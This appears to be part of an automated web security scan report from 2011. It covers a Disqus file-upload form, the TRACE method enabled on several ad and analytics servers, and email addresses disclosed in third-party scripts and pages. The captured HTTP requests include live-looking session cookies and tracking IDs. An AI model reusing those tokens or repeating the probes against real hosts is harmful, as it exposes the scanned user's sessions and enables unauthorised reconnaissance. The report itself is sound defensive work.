Severity:   Information
Confidence:   Certain
Host:   http://mediacdn.disqus.com
Path:   /1304703476/build/system/upload.html

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:

Request

GET /1304703476/build/system/upload.html HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-487374334-1303349183888; sessionid=5439c19bf65868637b6d94bd5708f992; __utmz=113869458.1304526991.8.8.utmcsr=news.techworld.com|utmccn=(referral)|utmcmd=referral|utmcct=/personal-tech/3277379/x-factor-contestants-warned-after-250000-data-breach/; __utma=113869458.1602204697.1303349184.1304359650.1304526991.8

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Sat, 07 May 2011 00:13:03 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html
Vary: Accept-Encoding
X-Varnish: 2794960096
Cache-Control: max-age=2370975
Expires: Mon, 06 Jun 2011 00:37:40 GMT
Date: Mon, 09 May 2011 14:01:25 GMT
Connection: close
Content-Length: 13708

<html>
<head>
<meta charset="utf-8">
<title></title>


<style type="text/css">
html,body,div,span,applet,object,iframe,h1,h2,h3,h4,h5,h6,p,blockquote,pre,a,abbr,acronym,a
...[SNIP]...
<!-- dynamic -->
<input type="file" name="attachment" onchange="mediaUploadRpc.onUploadStart();this.parentNode.submit();" />
<input type="hidden" name="id" value="" />
...[SNIP]...
18. TRACE method is enabled  previous  next
There are 6 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

18.1. http://alvenda.122.2o7.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://alvenda.122.2o7.net
Path:   /

Request

TRACE / HTTP/1.0
Host: alvenda.122.2o7.net
Cookie: ce41e1c3f36467de

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:53 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: alvenda.122.2o7.net
Cookie: ce41e1c3f36467de
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243

18.2. http://ie-stat.bmmetrix.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ie-stat.bmmetrix.com
Path:   /

Request

TRACE / HTTP/1.0
Host: ie-stat.bmmetrix.com
Cookie: 4f1ab55c4b9b1e12

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:03:51 GMT
Server: Apache/2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: ie-stat.bmmetrix.com
Cookie: 4f1ab55c4b9b1e12

18.3. http://imp.fetchback.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /

Request

TRACE / HTTP/1.0
Host: imp.fetchback.com
Cookie: c1307d2052afdace

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:32 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: imp.fetchback.com
Cookie: c1307d2052afdace

18.4. http://ipcmedia.122.2o7.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ipcmedia.122.2o7.net
Path:   /

Request

TRACE / HTTP/1.0
Host: ipcmedia.122.2o7.net
Cookie: aaa62a00c24e0275

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:02 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: ipcmedia.122.2o7.net
Cookie: aaa62a00c24e0275
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243

18.5. http://optimized-by.rubiconproject.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /

Request

TRACE / HTTP/1.0
Host: optimized-by.rubiconproject.com
Cookie: b19987d2c7c41052

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:22 GMT
Server: RAS/1.3 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: b19987d2c7c41052
Host: optimized-by.rubiconproject.com
X-Forwarded-For: 173.193.214.243

18.6. http://secure-au.imrworldwide.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://secure-au.imrworldwide.com
Path:   /

Request

TRACE / HTTP/1.0
Host: secure-au.imrworldwide.com
Cookie: 52703e1c43f9a364

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:48 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 52703e1c43f9a364
Host: secure-au.imrworldwide.com

19. Email addresses disclosed  previous  next
There are 18 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

19.1. http://ads.adbrite.com/adserver/vdi/742697  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Issue detail

The following email address was disclosed in the response:

Request

GET /adserver/vdi/742697?d=2931142961646634775 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb=0:682865:20838240:null:0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0; b="%3A%3Axews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo0CgY2ODQzMzkY5Y3LuQsiJDRkYWI3ZDM1LWIxZDItOTE1YS1kM2MwLTlkNTdmOWM2NmIwNwo0CgY3MTEzODQYiP7KzRMiJGMxZTEzMDFlLTNhMWYtNGNhNy05ODcwLWY2MzZiNWYxMGU2NgocCgY3MTIxNTYY6Nv74xMiDHhyZDUyemt3anV4aAojCgY3NDI2OTcY8rjOrAwiEzI5MzExNDI5NjE2NDY2MzQ3NzUKJAoGNzUzMjkyGNCZ6o0TIhRBTS0wMDAwMDAwMDAzMDYyMDQ1Mgo2CgY3NjI3MDEQhJaVmQoYpNGM7RMiIDk3ODk3MkRGQTA2MzAwMEQyQzBFN0EzODBCRkExREVDCiEKBjc3OTA0NRjPwZngEyIRMTc2NDcxMDgwMDYwMzQwODkKFgoGNzgyNjA2EIC7iqMKGICT7M0TIgAKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUKNAoGODEwNjQ3GMnBh4REIiQ1NDkxODhhMS1hMDdjLTQyMzEtYmU5NC03ZjcyNWUxYTE5ZjcKMAoGODMwNjk3GIvXg80OIiA5UVF4Y1RPNXVIMklhN0JrNHZHUzJTOTZ1Zk9Hc1NEQxAB; ut="1%3AXZFJtsIgEEX3wjgDGtMcdxMEE35oQhNzorh3AX88xumtW6%2Bq4AFuGJwfYOLbahzz4AzcKtUSkVW%2BbSOKsMrAZzC3rIDLOHaDhf0tQTkEFXGklRdCk2xRWNoi%2BptgdnU94ToM7xJPLmaVteS%2BJtIRJxNB9e5dzcHbqTpQL7mUidCwmtjGhpKPqH%2FaZSO25pQpg4ss2%2FuJhDlrVqOy6EmZtKhTRpfhlnX%2FV5ZIUR9n95j1%2Be6x8%2B8zF5MysXcpbN6uWsdURuG%2BvxLHuX%2BEw1do016%2BQ0EFaK81d6J8AHg%2BXw%3D%3D"; fq="7l04r%2C1uo0%7Clkjpsr%2C80kpw%2C1uo0%7Clkkjk6%2C86xtm%2C1uo0%7Clkkk10%2C86egg%2C1uo0%7Clkkk0s%2C873x5%2C1uo0%7Clkkz7b%2C8721s%2C1uo0%7Clkkjgh%7Clkkjhg%7Clkkjhn%7Clkkjhq%7Clkkjk1%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr%2C84y2m%2C1uo0%7Clkjpt2%2C8413g%2C1uo0%7Clkl4dq%2C86eg6%2C1uo0%7Clkkk0h%2C86xsv%2C1uo0%7Clkkjk7%7Clkkjke%7Clkkjkh%7Clkkz71"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 09 May 2011 14:00:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Tue, 10-May-2011 14:00:11 GMT
Set-Cookie: rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo0CgY3MTEzODQYiP7KzRMiJGMxZTEzMDFlLTNhMWYtNGNhNy05ODcwLWY2MzZiNWYxMGU2NgocCgY3MTIxNTYY6Nv74xMiDHhyZDUyemt3anV4aAojCgY3NDI2OTcYm9WOzw4iEzI5MzExNDI5NjE2NDY2MzQ3NzUKJAoGNzUzMjkyGNCZ6o0TIhRBTS0wMDAwMDAwMDAzMDYyMDQ1Mgo2CgY3NjI3MDEQhJaVmQoYpNGM7RMiIDk3ODk3MkRGQTA2MzAwMEQyQzBFN0EzODBCRkExREVDCiEKBjc3OTA0NRjPwZngEyIRMTc2NDcxMDgwMDYwMzQwODkKFgoGNzgyNjA2EIC7iqMKGICT7M0TIgAKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUKNAoGODEwNjQ3GMnBh4REIiQ1NDkxODhhMS1hMDdjLTQyMzEtYmU5NC03ZjcyNWUxYTE5ZjcKMAoGODMwNjk3GIvXg80OIiA5UVF4Y1RPNXVIMklhN0JrNHZHUzJTOTZ1Zk9Hc1NEQxAB; path=/; domain=.adbrite.com; expires=Sun, 07-Aug-2011 14:00:11 GMT
Set-Cookie: ut="1%3AXZDJloMgEEX%2FhbULhiie%2FI0EokQGGRKPCfn3Bjr2ib293Ee9qhd4YHB%2BgVlsq%2FU8gDPwq9L3hJwOlCaUYFNAKGChvILLNPWjg8MjQzVGnXBiTZDSkGIxWGMJ3WZYXNPOuI3j75PILuaNc%2BS5ZtITrzJB7e5d7cHbqT7QoIRSmbC42kRTx8ifaP7FVSe37lQoh3dV24eZxKVozqBa9KRtLuq1NXW44%2F1ny%2FqlbI%2BzcfA5tmxXY9KQEIrP%2FR4CF3OC41e8o5fvOGgAG4wRXtZTg%2Ff7Bw%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 06-May-2021 14:00:11 GMT
Set-Cookie: vsd=0@1@4dc7f36b@cdn.turn.com; path=/; domain=.adbrite.com; expires=Wed, 11-May-2011 14:00:11 GMT
Set-Cookie: fq=; path=/; domain=.adbrite.com; expires=Mon, 09-May-2011 14:00:11 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
19.2. http://asthmatickitty.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://asthmatickitty.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: asthmatickitty.com
Proxy-Connection: keep-alive
Referer: http://www.sufjan.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:21 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Content-Type: text/html
Content-Length: 39321


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Asthmatic Kitty Records : Home</title>
<script src="/mint/?js" type="text/javascript"></script>

<script language
...[SNIP]...
<a href="mailto:info@asthmatickitty.com">
...[SNIP]...
<br>
info@asthmatickitty.com</a>
...[SNIP]...
19.3. http://asthmatickitty.com/news.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://asthmatickitty.com
Path:   /news.php

Issue detail

The following email address was disclosed in the response:

Request

GET /news.php HTTP/1.1
Host: asthmatickitty.com
Proxy-Connection: keep-alive
Referer: http://asthmatickitty.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MintAcceptsCookies=1; __utmz=1.1304949953.1.1.utmcsr=sufjan.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.851040495.1304949953.1304949953.1304949953.1; __utmc=1; __utmb=1.1.10.1304949953; MintUnique=1; MintUniqueHour=1304949600; MintUniqueDay=1304917200; MintUniqueWeek=1304830800; MintUniqueMonth=1304226000; MintUniqueLocation=1; MintCrush=-409446192

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:34 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Content-Type: text/html
Content-Length: 147990

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>Asthmatic Kitty Records</title>
<script src="/mint/?js" type="text/javascript"></script>
<script language="JavaScr
...[SNIP]...
<a href="mailto:info@asthmatickitty.com">
...[SNIP]...
<br>
info@asthmatickitty.com</a>
...[SNIP]...
19.4. http://cdn11.surphace.com/javascript/omniture_h15.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn11.surphace.com
Path:   /javascript/omniture_h15.js

Issue detail

The following email address was disclosed in the response:

Request

GET /javascript/omniture_h15.js HTTP/1.1
Host: cdn11.surphace.com
Proxy-Connection: keep-alive
Referer: http://widgets.surphace.com/partner/omniture/sphereomni_api.php?siteid=tribune_orlandosentinel&evt=fireSphereOmInitAction&omid=501482
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Fri, 06 May 2011 19:44:29 GMT
X-Machine: web18
Content-Type: application/javascript
X-Forwarded-For: 72.246.64.167
Content-Length: 38862
X-Varnish: 872164619 871035654
Date: Mon, 09 May 2011 13:59:58 GMT
Connection: close

/* SiteCatalyst code version: H.15.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com - updated 9/10/2008*/
/************************ ADDITIONAL FEATURES *************
...[SNIP]...
)`i+s.hav()+q+(qs?qs:s.rq(^C)),0,id,ta);qs`h;`Wm('t')`5s.p"
+"_r)s.p_r()}^7(qs);^y`o(@g;`k@g`L^9,`F$51',vb`R@G=^D=s.`N`g=s.`N^K=`E^z^x=s.ppu=^n=^nv1=^nv2=^nv3`h`5$t)`E^z@G=`E^zeo=`E^z`N`g=`E^z`N^K`h`5!id@Us.tc){s.tc=1;s.flush`Z()}`2$h`Atl`0o,t,n,vo`1;s.@G=@uo"
+"`R`N^K=t;s.`N`g=n;s.t(@g}`5pg){`E^zco`0o){`K@J\"_\",1,#8`2@uo)`Awd^zgs`0$P{`K@J$k1,#8`2s.t()`Awd^zdc`0$P{`K@J$k#8`2s.t()}}@2=(`E`I`X`8`4@ss@b0`Rd=^
...[SNIP]...
19.5. http://mediacdn.disqus.com/1304703476/build/system/disqus.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mediacdn.disqus.com
Path:   /1304703476/build/system/disqus.js

Issue detail

The following email address was disclosed in the response:

Request

GET /1304703476/build/system/disqus.js? HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-487374334-1303349183888; sessionid=5439c19bf65868637b6d94bd5708f992; __utmz=113869458.1304526991.8.8.utmcsr=news.techworld.com|utmccn=(referral)|utmcmd=referral|utmcct=/personal-tech/3277379/x-factor-contestants-warned-after-250000-data-breach/; __utma=113869458.1602204697.1303349184.1304359650.1304526991.8

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Sat, 07 May 2011 00:13:15 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: application/javascript
Vary: Accept-Encoding
X-Varnish: 2794956330 2794955461
Cache-Control: max-age=2371001
Expires: Mon, 06 Jun 2011 00:37:40 GMT
Date: Mon, 09 May 2011 14:00:59 GMT
Connection: close
Content-Length: 188344

DISQUS.dtpl=(function(){var b={version:"0.2",author:"Anton Kovalyov <anton@disqus.com>"};b.getGuestFields=function(g){function f(h){return DISQUS.nodes.get("#"+h+(g?"-"+g:""))}return{name:f("dsq-field
...[SNIP]...
19.6. http://s.meebocdn.net/cim/script/cim_v92_cim_11_8_0.en.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.meebocdn.net
Path:   /cim/script/cim_v92_cim_11_8_0.en.js

Issue detail

The following email address was disclosed in the response:

Request

GET /cim/script/cim_v92_cim_11_8_0.en.js?1303937101 HTTP/1.1
Host: s.meebocdn.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-None-Match: "2176889624"
If-Modified-Since: Thu, 21 Apr 2011 23:08:27 GMT

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Accept-Ranges: bytes
ETag: "2176889624"
Last-Modified: Thu, 21 Apr 2011 23:08:27 GMT
Date: Mon, 09 May 2011 14:00:39 GMT
Server: lighttpd/1.4.19
Vary: Accept-Encoding
Cache-Control: private, max-age=604800
Age: 468139
Expires: Wed, 11 May 2011 03:58:20 GMT
Connection: Keep-Alive
Content-Length: 241537

// Copyright 2005-2010 Meebo, inc.
//
// RSA javascript implementation Copyright 1998-2005 David Shapiro
// please see http://www.ohdave.com/rsa/
// SHA256 javascript implementation Copyright 2003-200
...[SNIP]...
<a href="mailto:ad-feedback@meebo-inc.com?subject='+
encodeURIComponent("Comment about: "+this.m_ad.getProp("share"))+
'" class="meebo-0 meebo-277">
...[SNIP]...
19.7. http://w.sharethis.com/button/buttons.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://w.sharethis.com
Path:   /button/buttons.js

Issue detail

The following email address was disclosed in the response:

Request

GET /button/buttons.js HTTP/1.1
Host: w.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1
If-None-Match: "2a0f5-97fe-4a14eed717780"
If-Modified-Since: Wed, 20 Apr 2011 00:44:30 GMT

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 06 May 2011 17:26:10 GMT
ETag: "305eb-9ecb-4a29ec924b080"
Accept-Ranges: bytes
Content-Type: application/javascript
Date: Mon, 09 May 2011 13:59:30 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 40651

var cookie=new function(){return{setCookie:function(d,f,h){if(h){var c=new Date();c.setTime(c.getTime()+(h*24*60*60*1000));var a="; expires="+c.toGMTString()}else{var a=""}var b=d+"="+escape(f)+a;var
...[SNIP]...
lse};stLight.onReady=function(){stLight.readyRun=true;if(stLight.publisher==null){if(typeof(window.console)!=="undefined"){try{console.log("Please specify a ShareThis Publisher Key \nFor help, contact support@sharethis.com")}catch(a){}}}var b="share4x";if(switchTo5x){b="share5x"}if(stLight.hasButtonOnPage()){if(stLight.loadedFromBar){if(switchTo5x){b="bar_share5x"}else{b="bar_share4x"}}}else{if(stLight.loadedFromBar){b=
...[SNIP]...
19.8. http://widgets.twimg.com/j/2/widget.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.twimg.com
Path:   /j/2/widget.css

Issue detail

The following email address was disclosed in the response:

Request

GET /j/2/widget.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: widgets.twimg.com

Response

HTTP/1.0 200 OK
x-amz-id-2: yFPEo7/5CTnxmKnUEjXU1/OmPGPsNh0IMRRhNdN4WTdj8fNE1ntiR92x6Uowmhmg
x-amz-request-id: DD5E22500AC48FB0
Date: Sun, 08 May 2011 02:35:35 GMT
Expires: Sat, 27 Feb 2021 01:15:01 GMT+00:00
Last-Modified: Wed, 02 Mar 2011 01:15:13 GMT
ETag: "9842b420d8c91a4cbb004d17a5d54054"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 3430
Server: AmazonS3
Age: 127832
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 6f004e9b22ad9de1fb3ec72c46c20e0edfb2968f18caebf676529f334ba15b0d3d3f99de22c42f0a
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 c05eb8e83f57cc8dcfba97cefa36e0a4.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

/**
* Twitter - http://twitter.com
* Copyright (C) 2010 Twitter
* Author: Dustin Diaz (dustin@twitter.com)
*
* V 2.2.5 Twitter search/profile/faves/list widget
* http://twitter.com/widgets
* For full documented source see http://twitter.com/javascripts/widgets/widget.js
* Hosting and modifications of
...[SNIP]...
19.9. http://widgets.twimg.com/j/2/widget.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.twimg.com
Path:   /j/2/widget.js

Issue detail

The following email address was disclosed in the response:

Request

GET /j/2/widget.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: widgets.twimg.com

Response

HTTP/1.0 200 OK
x-amz-id-2: /PA731toNx972OXjAmpMncbSDYG7pU/61LXV/1IwSSaURoBa3/0W99IUiTyaOKij
x-amz-request-id: 1F8F72FFC4060381
Date: Fri, 06 May 2011 15:21:09 GMT
Last-Modified: Fri, 08 Apr 2011 20:34:17 GMT
ETag: "8f109f7ba100454bc391fc07377c1aed"
Accept-Ranges: bytes
Content-Type: application/javascript
Content-Length: 31383
Server: AmazonS3
Age: 6297
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: bb7daf63a24e2f7ef067c9dcee39feb3947e844dcd48733f933c22c4b9340d8331a9b166597bff9b
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 c05eb8e83f57cc8dcfba97cefa36e0a4.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

/**
* Twitter - http://twitter.com
* Copyright (C) 2010 Twitter
* Author: Dustin Diaz (dustin@twitter.com)
*
* V 2.2.5 Twitter search/profile/faves/list widget
* http://twitter.com/widgets
* For full documented source see http://twitter.com/javascripts/widgets/widget.js
* Hosting and modifications of
...[SNIP]...
19.10. http://www.clashmusic.com/sites/all/modules/shadowbox/shadowbox/src/skin/classic/skin.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /sites/all/modules/shadowbox/shadowbox/src/skin/classic/skin.css

Issue detail

The following email address was disclosed in the response:

Request

GET /sites/all/modules/shadowbox/shadowbox/src/skin/classic/skin.css HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5079a7bd09304b581fb1d164353615c5=h78ot6e3amth8f4pu158nlhcb2

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:33 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 12 Jan 2009 15:30:18 GMT
ETag: "7002e0-1474-c8b51680"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=1209600
Expires: Mon, 23 May 2011 14:00:33 GMT
Connection: close
Content-Type: text/css
Content-Length: 5236

/**
* The "classic" theme CSS for Shadowbox.
*
* This file is part of Shadowbox.
*
* Shadowbox is an online media viewer application that supports all of the
* web's most popular media pub
